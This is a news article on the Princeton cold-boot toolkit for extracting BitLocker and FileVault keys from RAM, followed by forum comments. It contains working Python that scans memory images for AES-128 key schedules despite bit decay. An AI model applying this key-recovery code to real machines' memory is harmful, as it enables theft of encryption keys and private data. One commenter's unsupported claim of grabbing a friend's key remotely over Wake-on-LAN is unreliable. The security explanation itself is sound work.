Toolkit breaks FileVault and BitLocker

Co-authors Seth Schoen and Jacob Appelbaum wrote the code that allows encryption keys to be snagged.

If you rely on disk encryption such as Microsoft's BitLocker or Apple's FileVault, you might want to think again: a team of security researchers has released a toolkit that allows the encryption used by popular packages to be bypassed.

Part of the Memory Research Project at Princeton University, the tools, released in source-code form and usable on pretty much any PC architecture once compiled, are an implementation of the techniques the team uncovered during its research into so-called 'cold boot' attacks against cryptographic systems, which it described in a paper published earlier this year.

CNet reports that attackers can use the code to reboot a running system, image its memory to a USB key or over the network, and automatically extract AES and RSA private keys, even if the region of memory holding the keys has partially degraded during the reboot.

If so, any cryptosystem that holds its key in RAM is exposed while the volume is mounted, and doubly so if it leaves the key in memory after it is no longer required. That includes the two most popular packages: BitLocker, which ships with Windows Vista Ultimate, and FileVault, which comes with Mac OS X. The paper singles out BitLocker's default TPM-only configuration as an especially easy target, because the TPM hands the key to the boot loader with no user interaction, so an attacker can simply power the machine on, wait for the key to be loaded, and then cold-boot it.

Although data in DRAM degrades once power is cut, the team found that it doesn't disappear as fast as previously assumed. Using a bitmap image stored in memory as a test pattern, they were able to recover enough data to reconstruct a recognisable version of the picture for almost a minute after the module lost power. Cooling the chips with a commercially-available 'spray duster' can of compressed gas extended this period to several minutes, and submerging the module in liquid nitrogen extended it to hours.

It is in this window that the software operates: the machine is quickly rebooted into a small program that dumps RAM, and a second program then searches the dump for AES and RSA private keys that can decrypt the target files. Rather than looking for the key bytes alone, the search looks for the surrounding structure a working implementation keeps in memory (for AES, the expanded key schedule), which is also what lets a further utility repair bit errors in a key if the memory wasn't imaged fast enough.
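As an added illustration of that search (written for this page, not the Princeton team's own code), the block below implements the AES-128 half of it in Python. An AES key in use is almost always accompanied by its 176-byte expanded key schedule, so the scanner expands every 16-byte window of the image and accepts a window when the 160 bytes that follow match the expansion within a Hamming-distance budget; that tolerance is what copes with decayed bits. The memory image, the embedded key and the decay model are constructed for the demo. The search assumes the 16 key bytes themselves survived and only tolerates errors in the round keys; the paper's full reconstruction also corrects errors inside the key, which this simplified version does not attempt.

```python
"""Scan a memory image for AES-128 key schedules, tolerating bit decay.

Added example for this article: a from-scratch illustration of the search
technique, not the Princeton team's tool.  Everything below runs offline.
"""
import random

# --- AES-128 key expansion (FIPS-197), built from scratch so nothing is imported ---

def _xtime(a):
    """Multiply by x in GF(2^8) modulo the AES polynomial x^8+x^4+x^3+x+1."""
    a <<= 1
    return (a ^ 0x1B) & 0xFF if a & 0x100 else a

def _gf_mul(a, b):
    r = 0
    while b:
        if b & 1:
            r ^= a
        a, b = _xtime(a), b >> 1
    return r

def _build_sbox():
    """S-box = affine transform of the multiplicative inverse (inverse of 0 is 0)."""
    sbox = bytearray(256)
    for x in range(256):
        inv = next((y for y in range(1, 256) if _gf_mul(x, y) == 1), 0) if x else 0
        s = inv
        for i in range(1, 5):
            s ^= ((inv << i) | (inv >> (8 - i))) & 0xFF
        sbox[x] = s ^ 0x63
    return bytes(sbox)

SBOX = _build_sbox()
RCON = [0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1B, 0x36]

def expand_key(key):
    """Return the 176-byte AES-128 key schedule (11 round keys) for a 16-byte key."""
    w = [bytes(key[i:i + 4]) for i in range(0, 16, 4)]
    for i in range(4, 44):
        t = w[i - 1]
        if i % 4 == 0:  # RotWord, SubWord, then XOR the round constant
            t = bytes([SBOX[t[1]] ^ RCON[i // 4 - 1], SBOX[t[2]], SBOX[t[3]], SBOX[t[0]]])
        w.append(bytes(a ^ b for a, b in zip(w[i - 4], t)))
    return b"".join(w)

# --- the search: a key is wherever the next 160 bytes equal its expansion ---

def schedule_distance(image, offset, max_bits):
    """Hamming distance between the schedule derived from the 16 bytes at
    offset and the 160 bytes that follow them; None once it exceeds max_bits."""
    window = image[offset:offset + 176]
    if len(window) < 176:
        return None
    sched = expand_key(window[:16])
    dist = 0
    for a, b in zip(sched[16:], window[16:]):
        dist += bin(a ^ b).count("1")
        if dist > max_bits:      # random data fails within a few bytes
            return None
    return dist

def find_aes_keys(image, max_bits=32):
    """All (offset, key, decayed_bits) whose schedule matches within max_bits.
    Assumes the key bytes themselves are intact (the paper's reconstruction
    also repairs errors inside the key; this simplified search does not)."""
    hits = []
    for off in range(len(image) - 175):
        d = schedule_distance(image, off, max_bits)
        if d is not None:
            hits.append((off, bytes(image[off:off + 16]), d))
    return hits

def simulate_decay(buf, fraction, seed):
    """Clear a fraction of the set bits: cells drift towards their ground state
    (taken to be 0 here) once the module loses power.  Constructed model."""
    rng = random.Random(seed)
    out = bytearray(buf)
    for i in range(len(out)):
        for bit in range(8):
            if out[i] >> bit & 1 and rng.random() < fraction:
                out[i] &= ~(1 << bit) & 0xFF
    return bytes(out)

def demo():
    """Constructed 4 KiB 'memory image': random filler with one schedule at 1000."""
    key = bytes.fromhex("000102030405060708090a0b0c0d0e0f")
    rng = random.Random(7)
    image = bytearray(rng.randrange(256) for _ in range(4096))
    sched = expand_key(key)
    # decay only the round keys; the 16 key bytes are left intact (see find_aes_keys)
    decayed = sched[:16] + simulate_decay(sched[16:], 0.015, seed=1)
    image[1000:1176] = decayed
    flipped = sum(bin(a ^ b).count("1") for a, b in zip(sched, decayed))
    return {"key": key, "flipped_bits": flipped, "hits": find_aes_keys(bytes(image))}

if __name__ == "__main__":
    for off, key, errs in demo()["hits"]:
        print(f"AES-128 key at offset {off}: {key.hex()} ({errs} decayed bits)")
```

The budget of 32 bits is generous for 1,280 schedule bits: a window of unrelated data disagrees with its own expansion in about half of them, so the early abort fires after a handful of bytes and false positives are not a practical concern. AES-256 schedules (240 bytes) and RSA keys (the CRT parameters p, q, d mod (p-1) and so on are mutually redundant) can be found the same way with a different expansion or consistency check.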

While the research has been reported before, this is the first time the team has released source code, putting the technique within reach of even the relatively untechnical. It's a blow for people who rely on cryptography to keep their private data private, but it's important to note that the attack is hardly subtle: the attacker needs physical access to the machine and has to reboot it, so it isn't something a remote attacker could reasonably pull off, even allowing for the possibility of netboot code. If in doubt, I'd recommend unmounting your encrypted volumes when they're not in use, and if your data is really private, shutting the machine down fully rather than suspending it, since a sleeping laptop keeps its keys in RAM.

Anybody here fancy compiling the code and seeing if they can break their FileVault or BitLocker encryption, or do we all have nothing to hide? Share your thoughts over in the forums.

Da Dego 22nd July 2008, 14:19 Quote
I'm not sure how I feel about this. I mean, I don't care that the source code is released and obviously the exploit has been around since we last reported on it. The question is whether it's truly notable.

At some point, there's a hardware flaw and that can't be helped - we're talking about needing genuine local access to the machine, PLUS reboot ability, plus some type of bootable media ability. And all of this goes back to that encryption is as good as the user's technique in utilizing it, which should include unmounting encrypted drives when you're done using them (as Gareth mentions).

The only computers that have a lot to fear from this, then, are laptops which can be stolen before you've unmounted your secure partition. And in that case, were your data THAT sensitive, you could be using something like Seagate's Momentus FDE (full disk encryption) drive or the Silverstone encrypting enclosure. Neither of these should leave a key in your RAM.

So I guess it's good to point out the weakness, but it's important to realize that there's just no perfect system. A little common-sense from a user perspective turns this into a non-issue, and more of an academic finding as to the weakness of RAM technology.
cjmUK 22nd July 2008, 14:43 Quote
I think the point is, for most people, BitLocker et al. are fine, but if you are one of the country's top spies, you can choose different tools or modify your behaviour and you are still relatively safe.

Currently, I'm more concerned that the government gives away my entire digital identity on a weekly basis by posting CDs to strangers than I am about a determined infiltrator gaining physical access to my encrypted PC.
Tomm 22nd July 2008, 17:35 Quote
I wonder if either of those guys has ever touched a girl.
theevilelephant 22nd July 2008, 17:50 Quote
Originally Posted by Tomm
I wonder if either of those guys has ever touched a girl.

does their mother count?

But seriously, as mentioned before, you would have to have something really important for someone to bother going to these lengths to get the data. And if it was that important, methinks you would use something other than BitLocker.
Buzzons 22nd July 2008, 23:56 Quote

Full whitepaper on it...

And yeah, it worked to snag a TrueCrypt password.
knyghtryda 23rd July 2008, 02:00 Quote
This may not seem like a big deal for most people (and it isn't), but say you had a corporate/government environment and you wanted encryption keys for a project, which happen to be sitting on somebody's computer. All you'd have to do is plug in, reboot the machine, grab the keys (assuming no BIOS password was set) and leave, letting the machine finish booting. Think about it... this could be done in a span of minutes, which is plenty of time if, say, the entire floor is out for lunch. Kinda scary stuff.
p3ri0d 23rd July 2008, 02:45 Quote
Yeah, real scary.

I knew it was possible, but no public tool was out for it, only papers.
cjmUK 23rd July 2008, 10:13 Quote
Originally Posted by Buzzons

And yeah, it worked to snag a TrueCrypt password.

Only works when the user doesn't expressly close the encrypted file/volume in TrueCrypt.

When you close the volume, TrueCrypt overwrites any passwords & keys in memory.

They've already put a statement out to this effect in the last couple of weeks.
p3ri0d 23rd July 2008, 14:25 Quote
Originally Posted by cjmUK
Only works when the user doesn't expressly close the encrypted file/volume in TrueCrypt.

When you close the volume, TrueCrypt overwrites any passwords & keys in memory.

They've already put a statement out to this effect in the last couple of weeks.

You are forgetting that you can encrypt a whole windows system partition with TrueCrypt.

P.S.: I think Ubuntu fixed that bug as of 8.04. Not sure though.
Bluephoenix 24th July 2008, 05:37 Quote
One interesting thing is that if a PC is networked and you use the appropriate code, you can use the same trick but pull the right data from right over the network if a machine has Wake-on-LAN enabled (and that can be changed through other methods).

I've tried it in a lab setup here and it works: I was able to snag a friend's key from his laptop while he was connected to the network, and I was 3 buildings away.